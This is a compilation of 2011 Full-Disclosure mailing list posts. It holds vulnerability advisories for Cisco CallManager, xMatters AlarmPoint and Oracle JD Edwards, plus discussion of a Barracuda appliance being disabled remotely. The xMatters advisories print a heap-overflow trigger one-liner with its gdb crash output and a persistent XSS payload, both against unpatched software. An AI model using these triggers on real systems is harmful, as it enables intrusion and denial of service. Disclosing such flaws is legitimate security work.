Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[corpus.defero]

On Thu, 2011-04-28 at 08:29 -0700, ichib0d crane wrote:
(snipped)
> but that doesn't
> change the fact that Barracuda has done something likely bad here. A
> vendor should make it explicitly clear when they have the capability
> to disable remote products that have already been purchased. Maybe
> their ToS allows it, maybe not. Either way it is highly unethical.
> 
They can't. All they can do is disable updating of the virus and spam
definitions. It will still work without a subscription to 'energize
updates'.

There was once an obvious and open back door on these units redirecting
port 25 (naturally open on a firewall) to a listening SSH daemon for
IP's belonging to Barracuda. It was not very sophisticated, just an
IPTABLES rule.

Here is the rub with Barracuda - and forgive me for being rude but my
observations of them over the last few years has made them a bit of chew
toy. The majority of their core team are either clueless retards or high
on drugs. Honestly, just tug apart some of the code in one of these
boxes and it is seriously lame to the point anyone who has progressed
past schoolboy BASIC will usually cry laughing.

Seriously, anyone who pays $£40k for one of these really needs to be put
into an institution as it is money very poorly spent. That's the end of
my contribution and now I must sleep until I see that name spring up
again somewhere else.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ZDI-11-143: Cisco Unified CallManager xmldirectorylist.jsp SQL Injection Vulnerability

[ZDI Disclosures]

ZDI-11-143(formerly ZDI-CAN-965): Cisco Unified CallManager 
xmldirectorylist.jsp SQL Injection Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-143

April 28, 2011

-- CVE ID:
CVE-2011-1610

-- CVSS:
7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)

-- Affected Vendors:
Cisco

-- Affected Products:
Cisco Cisco Call Manager

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10889. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to inject arbitrary SQL into
the backend database on vulnerable installations of Cisco Unified CM.
Authentication is not required to exploit this vulnerability. 

The specific flaw exists within the Call Manager component. The system
exposes an Apache webserver which contains a JSP script vulnerable to
SQL injection. The xmldirectorylist.jsp file does not properly validate
the f, l, and n parameters before passing them to the database. A remote
attacker can abuse this to inject SQL statements to be evaluated by the
underlying database.

-- Vendor Response:
Cisco has issued an update to correct this vulnerability. More
details can be found at:

http://www.cisco.com/warp/public/707/cisco-sa-20110427-cucm.shtml

-- Disclosure Timeline:
2010-11-05 - Vulnerability reported to vendor
2011-04-28 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Sven Taute

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Requesting/Reserving CVE Question

[Henri Salo]

On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com wrote:
> Hello all,
> 
> First off, if this isn't the place to ask this question, I apologize, and
> feel free to ignore this e-mail.  
> 
> I've found a couple vulnerabilities in a web forum/portal/etc. product
> called IP.Board.  I was looking to reserve a CVE number, and I attempted to
> contact the address Mitre lists for reserving one, however, it's been
> nearly a month and I have not received anything back from them.  This is
> the first vulnerability I have found, and have never requested/reserved a
> CVE before, so I am a little unfamiliar with the process (although based
> off of the following website, it looks like all I need to do is send an
> e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  
> 
> I've sent follow up e-mails and I've received no response.  What my
> question to you all is how long does this process take?  Is there something
> else that should be done, or someone else the request should be sent to? 
> What's time normal time frame from requesting a CVE number to hearing back
> from them?
> 
> Thanks for any help/info/advice.  I appreciate it.
> 
> Chris

No luck. With open-source you could have tried:
http://oss-security.openwall.org/wiki/mailing-lists/oss-security

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[ichib0d crane]

Why is everyone ripping on this fellow just because he chose to
purchase a 'solution'? That's not the issue here at all. Sure he
should've done something more custom and open source, but that doesn't
change the fact that Barracuda has done something likely bad here. A
vendor should make it explicitly clear when they have the capability
to disable remote products that have already been purchased. Maybe
their ToS allows it, maybe not. Either way it is highly unethical.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Requesting/Reserving CVE Question

[ctruncer]

Hello all,

First off, if this isn't the place to ask this question, I apologize, and
feel free to ignore this e-mail.  

I've found a couple vulnerabilities in a web forum/portal/etc. product
called IP.Board.  I was looking to reserve a CVE number, and I attempted to
contact the address Mitre lists for reserving one, however, it's been
nearly a month and I have not received anything back from them.  This is
the first vulnerability I have found, and have never requested/reserved a
CVE before, so I am a little unfamiliar with the process (although based
off of the following website, it looks like all I need to do is send an
e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  

I've sent follow up e-mails and I've received no response.  What my
question to you all is how long does this process take?  Is there something
else that should be done, or someone else the request should be sent to? 
What's time normal time frame from requesting a CVE number to hearing back
from them?

Thanks for any help/info/advice.  I appreciate it.

Chris

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[Juan Sacco]

 Information
 
 Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
 Version: APClient 3.2.0 (native)
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Heap Buffer Overflow
 Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
 Severity : High
 Researcher : Juan Sacco 

 Description
 --
 The AlarmPoint Java Server consists of a collection of software
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to
 AlarmPoint.

 Details
 ---
 AlarmPoint APClient is affected by a Heap Overflow vulnerability in 
 version APClient 3.2.0 (native)

 A heap overflow condition is a buffer overflow, where the buffer that 
 can be overwritten is allocated in the heap portion of memory, generally 
 meaning that the buffer was allocated using a routine such as the POSIX 
 malloc() call.
 https://www.owasp.org/index.php/Heap_overflow


 Exploit as follow:
 Submit a malicious file cointaining the exploit
 root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$  
 ./APClient.bin --submit-file maliciousfile.hex
 or
 (gdb) run `python -c 'print "\x90"*16287'`
 Starting program: 
 /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c 
 'print "\x90"*16287'`

 Program received signal SIGSEGV, Segmentation fault.
 0x0804be8a in free ()
 (gdb) i r
 eax0xa303924170932516
 ecx0xbfb8   49080
 edx0xa303924170932516
 ebx0x8059438134583352
 esp0xbfff3620   0xbfff3620
 ebp0xbfff3638   0xbfff3638
 esi0x8059440134583360
 edi0x80653f0134632432
 eip0x804be8a0x804be8a 
 eflags 0x210206 [ PF IF RF ID ]
 cs 0x73 115
 ss 0x7b 123
 ds 0x7b 123
 es 0x7b 123
 fs 0x0  0
 gs 0x33 51
 (gdb)


 Solution
 ---
 No patch are available at this time.

 Credits
 ---
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[corpus.defero]

On Thu, 2011-04-28 at 13:09 +0300, Tõnu Samuel wrote:
> Hello!
> 
> We have alarming case with Barracuda products here.
> 
It's your own fault for buying one and being too lazy to create your own
anti-spam solution! It's all pretty much OSS and rubbish hardware and
any half decent Linux admin can easily fashion a system to do what the
Barracuda does {some caveats around the UI (itself poor and slow)}

If you Googled you would have found this as a starter for 10.

http://www.waraxe.us/ftopict-5340.html




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] hashdays 2011 - Call for Papers (#days CFP)

[Hashdays CFP]

Call for Paper for hashdays 2011 (#days)


Introduction

Hashdays is an international security technology and research conference
which is preceded by several 2-day workshops delivering IT security
training. The event features many international IT security experts
sharing their deep technical knowledge in an open environment and takes
place October 26th to 29th, 2011 in Lucerne. The conference is unique in
Switzerland and is organized by DEFCON Switzerland, a non-profit
association with the aim to give experts and professionals a platform to
transfer insights into the information security domain and to sensitize
users to information security topics. The official conference web site
is located at: https://www.hashdays.ch.

The Call For Paper (CFP) is now open and we are accepting interesting &
innovative proposals for 50-minute talks.

Please follow the following guide for submitting.

Scope
-
In particular, we are looking for topics in the following domains:
* Operating system and application security
* Wired and wireless network security
* Mobile communication security
* Forensics and anti-forensics
* Digital privacy and anonymous communication
* Reverse engineering of software and hardware
* Malware collection and analysis
* Botnet analysis
* Electronic voting
* Security metrics and visualization
* Intrusion detection and prevention
* Cloud computing security
* Cryptography and security protocols
* Biometric system security
* Quantitative and model based IT risk management

Submissions from academic and scientific institutions are welcome.

Deadlines
-
* Submission of package until: Sunday, July 3rd, 2011
* Latest notification date: Sunday, August 28th, 2011

Submission Guidelines
-
The submission package is assessed by the program committee and the
author is notified on the outcome by electronic means. Your submission
package must be delivered in non-proprietary electronic formats (e.g.
PDF, OpenOffice) and contain the following:

Talk details:
* Either:
o a proposal of your intended talk with at maximum 400 words XOR
o a full paper with a minimum of 6 and a maximum of 12 pages XOR
o a slide deck with a maximum of 45 slides
* 150 word abstract of the talk which will be displayed on our
conference website
* Rationale why your material is significant and should be presented
* Information on whether this talk has been or will be presented elsewhere
* Samples of other materials which might help to assess your submission
(optional)
* Links to your web presence, if relevant (optional)

Presenter details:
* Your name and contact information
* Location of residence
* Country where the passport was issued
* Name of employer and/or affiliations (optional)
* 150 word biography of the speaker for use on our conference website
* A photo of yourself which is shown along with your biography (optional)
* List of previous significant talks (topic and name of conference)
* List of publications

To submit your CFP, put all the requested information into an archive and
send it by e-mail to c...@defcon-switzerland.org.

Speaker Benefits

We offer the following benefits to accepted speakers:
* Free admission for the two conference days (including lunches and
coffee breaks)
* Invitation to the complimentary speaker's dinner
* Paid accommodation for two nights at the hotel where the conference
takes place
* Reimbursement of travel expenses in economy class up to a certain amount

However, we can reimburse travel and accommodation for one person per
talk only.

Terms
-
The author of the content keeps his or her full rights on the submitted
material. By submitting the CFP package the author agrees to the
following terms:
* You confirm that the material submitted is your own except for where
explicit references to third-party works are made.
* You confirm that you have obtained permission to use and distribute
third-party content, like images.
* You give permission to DEFCON Switzerland to publishing/distributing
your material either in physical or electronic format without royalty.
* You give permission to DEFCON Switzerland to create audio and video
recordings of your presentation and publish/distribute these without
royalty.
* You agree that travel and accommodation expenses are reimbursed only
upon successful delivery of your talk and upon presenting the receipts.
* You agree to reading out a disclaimer to the audience at the beginning
of your presentation if deemed necessary by DEFCON Switzerland.
* You agree not to hold DEFCON Switzerland liable for any direct or
indirect damages or costs in case the event is cancelled.

Sponsoring
--
If you like our conference, you can support us by sponsoring. We offer
attractive sponsoring opportunities. For details please contact:
sponsor...@defcon-switzerland.org.

Thank you and best regards,
#days organizing committee

___

Re: [Full-disclosure] Barracuda backdoor

[Tõnu Samuel]

On Thu, 2011-04-28 at 12:59 +0200, Christian Sciberras wrote:
> Oh I'm sure someone on the list is going to help you.
> Just give us SSH and root access and we'll do the hard work for you.
> See, that's being open, not closed...!

Sure someone can do. I happen to know some people who are able to
reverse engineer anything on PC but they are busy doing useful stuff
instead of proving someones bad intentions in Barracuda. To me it looks
like only correct way for Barracuda is to issue clear statement that
they remove all such "features" from their products and and issue free
patch for this. 

And yes, I am sure if Barracuda will act to hide problem we soon see
what else community find out.

World is weird. I happen to write review on all Barracuda product line
at same time. I will praise their product as "works of out of box" and
meanwhile I do not recommend such timebomb into server room but pay some
guy to configure postfix with all proper addons instead. Also this fact
already changed two "go" desicions from Barracuda to "no-go" ones in my
close contacts. 

  Tõnu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[James Lay]

On 4/28/11 4:09 AM, "Tõnu Samuel"  wrote:

>
>admin interface of product. Even more irritating was fact that admin
>wanted to see why some e-mails were lost and was denied even to see logs!
>


Hehyank the drive and mount it in a linux box...it's just Mandrake
linux anyways (most likely going against GPL since they are using ClamAV
and SpamAssassin).

J


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[Christian Sciberras]

Oh I'm sure someone on the list is going to help you.

Just give us SSH and root access and we'll do the hard work for you.

See, that's being open, not closed...!







On Thu, Apr 28, 2011 at 12:51 PM, Tõnu Samuel  wrote:

> On Thu, 2011-04-28 at 11:45 +0100, Benji wrote:
> > Do you actually have any evidence of a backdoor? Or could this just be
> > a remote 'turn-off' switch as such? I'm not saying that one is better
> > than the other, but they are very different features.
>
> I have no idea how this technically is implemented or what they can do
> else. This is clear example of closed source product dangers. Today we
> found some "switch off", tomorrow what? How we can be sure about
> anything? Only thing I am sure now: they kept copy of keys to house you
> bought from them years ago and their used those keys for illegal thing.
>
>  Tõnu
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[Tõnu Samuel]

On Thu, 2011-04-28 at 11:45 +0100, Benji wrote:
> Do you actually have any evidence of a backdoor? Or could this just be
> a remote 'turn-off' switch as such? I'm not saying that one is better
> than the other, but they are very different features.

I have no idea how this technically is implemented or what they can do
else. This is clear example of closed source product dangers. Today we
found some "switch off", tomorrow what? How we can be sure about
anything? Only thing I am sure now: they kept copy of keys to house you
bought from them years ago and their used those keys for illegal thing.

  Tõnu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stress Testing Tools

[BGA]

Hi,

for ddos testing:
T50
ddossim
netstress(commercial)
---
Huzeyfe ONAL
Bilgi Güvenliği AKADEMİSİ
http://www.bga.com.tr

BGA Ankara & İstanbul Eğitim Takvimi
http://www.bga.com.tr/?page_id=944

 ---



On Wed, Apr 27, 2011 at 12:44 PM, Oscar  wrote:

> Hi,
>
> I am also in the verg of testing firewall/IDS/IPS currently i am looking at
> some DOS/DDOS/stress testing tools.. Please help me on that..
>
> Thanks in Advance
> Oscar
>
> On Wed, Apr 27, 2011 at 11:17 AM, Sec Tools  wrote:
>
>>  I've been using a combination of Mausezahn (
>> http://www.perihel.at/sec/mz/index.html ), Tcpreplay (
>> http://tcpreplay.synfin.net ) and some times Scapy (
>> http://www.secdev.org/projects/scapy/ ) for our 1G/10G network stress
>> testing needs ( mostly for probing and checking the resilience of new
>> network appliances ).
>>
>> I noted that these tools were not updated recently (for one year aprox).
>> Do you guys have any suggestions on better approaches / really good new
>> tools to do this? ( note that currently our budget does not allow the use of
>> hardware based solutions ).
>>
>> Best Regards,
>>
>> John James
>> http://sectools.org/
>>
>> ___
>> Care2 makes it easy for everyone to live a healthy, green lifestyle and
>> impact the causes you care about most. Over 12 Million members!
>> http://www.care2.com Feed a child by searching the web! Learn how
>> http://www.care2.com/toolbar
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[Benji]

Do you actually have any evidence of a backdoor? Or could this just be a
remote 'turn-off' switch as such? I'm not saying that one is better than the
other, but they are very different features.

On Thu, Apr 28, 2011 at 11:09 AM, Tõnu Samuel  wrote:

> Hello!
>
> We have alarming case with Barracuda products here.
>
> Customer bought Barracuda hardware years ago and paid for it. No leasing
> etc. Product is Barracuda Spam Firewall 800 which is $40k product.
> Customer also paid for not-so-cheap annual subscription fees each year.
>
> One day their Barracuda product stopped working.
>
> After investigating problem it came out that Barracuda reseller and
> Barracuda itself have some misunderstandings and because of this
> Barracuda not only disabled all kind of subscription services but also
> used some kind of backdoor in their products to disable product customer
> had paid long time ago.
>
> Message was shown "Error: Activation has not been completed. Please
> activate your Barracuda Spam & Virus Firewall to enable functionality.
> (Click here to activate)". Customer was blocked to make any changes in
> admin interface of product. Even more irritating was fact that admin
> wanted to see why some e-mails were lost and was denied even to see logs!
>
> Notice - Barracuda have not just disabled some online services (which
> were paid too) but they remotely disabled hardware product which does
> not belong to them.
>
> I think users should be warned for companies like Barracuda. As much I
> understand this is also criminal violation to sabotage some other
> company network resources.
>
>   Tõnu
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint

[Juan Sacco]

 Information
 
 Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web 
 Server API
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Cross-Site Scripting
 Severity : High
 Researcher : Juan Sacco 

 Description
 --
 The AlarmPoint Java Server consists of a collection of software  
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to 
 AlarmPoint.

 Details
 ---
 AlarmPoint Java Web Server API is affected by a Persistent XSS 
 vulnerability in version 3.2.1

 Exploit as follow:
 Insert new HTTP API with the following malicious code:
 
 

Alive


ping

 '>alert(/XSS/)

 Go to: http://example.com:2010/agent/status.html
 Reponse:
 AgentStatus
 3.2.1 (Build 
 
23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'>alert(/XSS/)

 Cross-Site Scripting attacks are a type of injection problem, in which 
 malicious scripts are injected into the otherwise benign and trusted web 
 sites.
 https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

 Solution
 ---
 No patch are available at this time.

 Credits
 ---
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Barracuda backdoor

[Tõnu Samuel]

Hello!

We have alarming case with Barracuda products here.

Customer bought Barracuda hardware years ago and paid for it. No leasing 
etc. Product is Barracuda Spam Firewall 800 which is $40k product. 
Customer also paid for not-so-cheap annual subscription fees each year.

One day their Barracuda product stopped working.

After investigating problem it came out that Barracuda reseller and 
Barracuda itself have some misunderstandings and because of this 
Barracuda not only disabled all kind of subscription services but also 
used some kind of backdoor in their products to disable product customer 
had paid long time ago.

Message was shown "Error: Activation has not been completed. Please 
activate your Barracuda Spam & Virus Firewall to enable functionality. 
(Click here to activate)". Customer was blocked to make any changes in 
admin interface of product. Even more irritating was fact that admin 
wanted to see why some e-mails were lost and was denied even to see logs!

Notice - Barracuda have not just disabled some online services (which 
were paid too) but they remotely disabled hardware product which does 
not belong to them.

I think users should be warned for companies like Barracuda. As much I 
understand this is also criminal violation to sabotage some other 
company network resources.

   Tõnu

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stress Testing Tools

[Oscar]

Hi,

I am also in the verg of testing firewall/IDS/IPS currently i am looking at
some DOS/DDOS/stress testing tools.. Please help me on that..

Thanks in Advance
Oscar

On Wed, Apr 27, 2011 at 11:17 AM, Sec Tools  wrote:

>  I've been using a combination of Mausezahn (
> http://www.perihel.at/sec/mz/index.html ), Tcpreplay (
> http://tcpreplay.synfin.net ) and some times Scapy (
> http://www.secdev.org/projects/scapy/ ) for our 1G/10G network stress
> testing needs ( mostly for probing and checking the resilience of new
> network appliances ).
>
> I noted that these tools were not updated recently (for one year aprox). Do
> you guys have any suggestions on better approaches / really good new tools
> to do this? ( note that currently our budget does not allow the use of
> hardware based solutions ).
>
> Best Regards,
>
> John James
> http://sectools.org/
>
> ___
> Care2 makes it easy for everyone to live a healthy, green lifestyle and
> impact the causes you care about most. Over 12 Million members!
> http://www.care2.com Feed a child by searching the web! Learn how
> http://www.care2.com/toolbar
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [Onapsis Security Advisory 2011-013] Oracle JD Edwards JDENET USRBROADCAST Denial of Service

[Onapsis Research Labs]

Onapsis Security Advisory 2011-013: Oracle JD Edwards JDENET USRBROADCAST 
Denial of Service

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well as exclusive access 
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, an unauthenticated attacker would be able to 
remotely disrupt the JD Edwards server.
This would result in the total unavailability of the ERP functionality, 
preventing company users from performing the required business processes.

-- Risk Level:  High


2. Advisory Information
===

-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-13

-- Onapsis SVS ID: ONAPSIS-00022

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information


-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne  Tools 8.98
( older versions might be also affected)

-- Vulnerability Class: Memory corruption

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-13


4. Affected Components Description
==

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details


If a specially crafted packet is sent to the JDENet service, and access 
violation is raised. As the process fails to process this exception, this 
results in a crash that would render the system unavailable.
Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch their 
systems and protect against the exploitation of the
described vulnerability.


6. Solution
===

Apply Oracle Critical Patch update April – 2010. More information available on 
http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
Onapsis strongly recommends Oracle customers to download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
business critical systems and applications.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved in this 
special team lead the public research trends in this matter, having discovered 
and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality of our 
solutions and enabling our customers to be protected from the latest risks to 
their critical business information.

Furthermore, the results of this research projects are usually shared with the 
general security and professional community, encouraging the sharing of 
information and increasing the common knowledge in this field.


About Onapsis
=

Onapsis is the leading provider of solutions for the security of ERP and 
business-critical systems and applications. Through different innovative 
products and services, Onapsis helps its global customers to effectively 
increase the security level of their core business platforms, protecting their 
information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the ERP security 
field, with several years of experience in the assessment and protection of 
critical platforms in world-wide customers, such as
Fortune-500 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated 
Security & Compliance Audits, Vulnerability Assessments and Penetration Tests 
over their SAP platform, helping them enforce compliance requirements, decrease 
financial fraud risks an reduce audit costs drastica

[Full-disclosure] [Onapsis Security Advisory 2011-012] Oracle JD Edwards JDENET Firewall Bypass

[Onapsis Research Labs]

Onapsis Security Advisory 2011-012: Oracle JD Edwards JDENET Firewall Bypass

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well as exclusive access 
to special promotions for upcoming trainings and conferences.


1. Impact on Business
=

By exploiting this vulnerability, a remote unauthenticated might be able to 
connect to the ERP system, bypassing weak network firewall configurations.
This might result in obtaining remote access to the ERP system, even though 
this access was supposed to be restricted to internal networks.

-- Risk Level:  Low


2. Advisory Information
===

-- Release Date: 2011-04-27

-- Last Revised: 2011-04-27

-- Security Advisory ID: ONAPSIS-2011-12

-- Onapsis SVS ID: ONAPSIS-00024

-- Researcher: Juan Pablo Perez Etchegoyen


3. Vulnerability Information


-- Vendor: ORACLE

-- Affected Components:

* JD Edwards 9.0 EnterpriseOne Server + EnterpriseOne  Tools 8.98
( older versions might be also affected)

-- Vulnerability Class: Abuse of designed functionality

-- Remotely Exploitable: Yes

-- Locally Exploitable: No

-- Authentication Required: No

-- Original Advisory: 
http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-12


4. Affected Components Description
==

JDENet is a network communication middleware that performs network 
communications workstation-to-server and server-to-server. It is used to call 
remote functions, to authenticate users and transmit information between hosts 
in a JD Edwards environment.


5. Vulnerability Details


If a specially-crafted UDP packet is sent to the JDENet port, the JDENET 
service creates a TCP connection to the provided IP and PORT parameters.
This connection could be used to access the JDENET and all ERP functionallity 
provided through that callback connection.

Further technical details about this issue are not disclosed at this moment 
with the purpose of providing enough time to affected customers to patch their 
systems and protect against the exploitation of the
described vulnerability.

6. Solution
===

Apply Oracle Critical Patch update April – 2010. More information available on 
http://www.oracle.com/technetwork/topics/security/cpuapr2011-301950.html
Onapsis strongly recommends Oracle customers to download the related security 
fixes and apply them to the affected components in order to reduce business 
risks.


7. Report Timeline
==

* 2010-09-20: Onapsis provides vulnerability information to Oracle.
* 2010-09-21: Oracle confirms reception of vulnerability submission.
* 2010-09-24: Oracle states vulnerability is under investigation.
* 2010-10-07: Oracle confirms vulnerability.
* 2011-04-19: Oracle releases fixes in CPU.
* 2011-04-27: Onapsis releases security advisory.


About Onapsis Research Labs
===

Onapsis is continuously investing resources in the research of the security of 
business critical systems and applications.

With that objective in mind, a special unit – the Onapsis Research Labs – has 
been developed since the creation of the company. The experts involved in this 
special team lead the public research trends in this matter, having discovered 
and published many of the public security vulnerabilities in these platforms.

The outcome of this advanced and cutting-edge research is continuously provided 
to the Onapsis Consulting and Development teams, improving the quality of our 
solutions and enabling our customers to be protected from the latest risks to 
their critical business information.

Furthermore, the results of this research projects are usually shared with the 
general security and professional community, encouraging the sharing of 
information and increasing the common knowledge in this field.


About Onapsis
=

Onapsis is the leading provider of solutions for the security of ERP and 
business-critical systems and applications. Through different innovative 
products and services, Onapsis helps its global customers to effectively 
increase the security level of their core business platforms, protecting their 
information and decreasing financial fraud risks.

Onapsis is built upon a team of world-renowned experts in the ERP security 
field, with several years of experience in the assessment and protection of 
critical platforms in world-wide customers, such as
Fortune-500 companies and governmental entities.

Our star product, Onapsis X1, enables our customers to perform automated 
Security & Compliance Audits, Vulnerability Assessments and Penetration Tests 
over their SAP platform, helping them enforce com

[Full-disclosure] [Onapsis Security Advisory 2011-011] Oracle JD Edwards JDENET Buffer Overflow

[Onapsis Research Labs]

Onapsis Security Advisory 2011-011: Oracle JD Edwards JDENET Buffer Overflow

This advisory can be downloaded in PDF format from http://www.onapsis.com/.
By downloading this advisory from the Onapsis Resource Center, you will gain 
access to beforehand information on upcoming advisories, presentations and new 
research projects from the Onapsis Research Labs, as well asexclusive access to 
special promotions for upcoming trainings and conferences.


1. Impact on Business
=

